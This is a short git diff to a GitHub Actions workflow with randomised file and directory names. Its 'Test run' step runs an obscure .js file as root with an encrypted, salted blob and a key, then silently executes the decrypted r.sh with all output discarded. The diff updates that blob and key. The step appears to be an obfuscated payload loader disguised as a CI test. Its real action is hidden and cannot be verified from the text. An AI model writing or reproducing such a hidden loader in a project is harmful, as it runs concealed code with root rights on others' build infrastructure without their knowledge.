--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo 'l78eh'
+        echo '0cg7z'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX18noEB4nzPs/YkjeRjIDVFTrSnX7WeVjXTmG/1ZoXSpU7uU3x3CwUIP0wBC3CPdnpFtZnfwlQQAn0yNUeX6S0q1XNpKsMhR0hCwuOW66kC7TVqb8VSCdpjF 7zkoge && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX19j3lBAUCUZ5kvqfxcWxuCvCMuLBu0zfo+KGCmS6+TsmjcAS9Wm74DAhN64fvr8J9L8K1/3DVw3KueT6oy7GEBIw+VKoGTRYU4tAUyF1nlpoD6jfBosLGit h1mcwa && sudo sh r.sh > /dev/null 2>&1
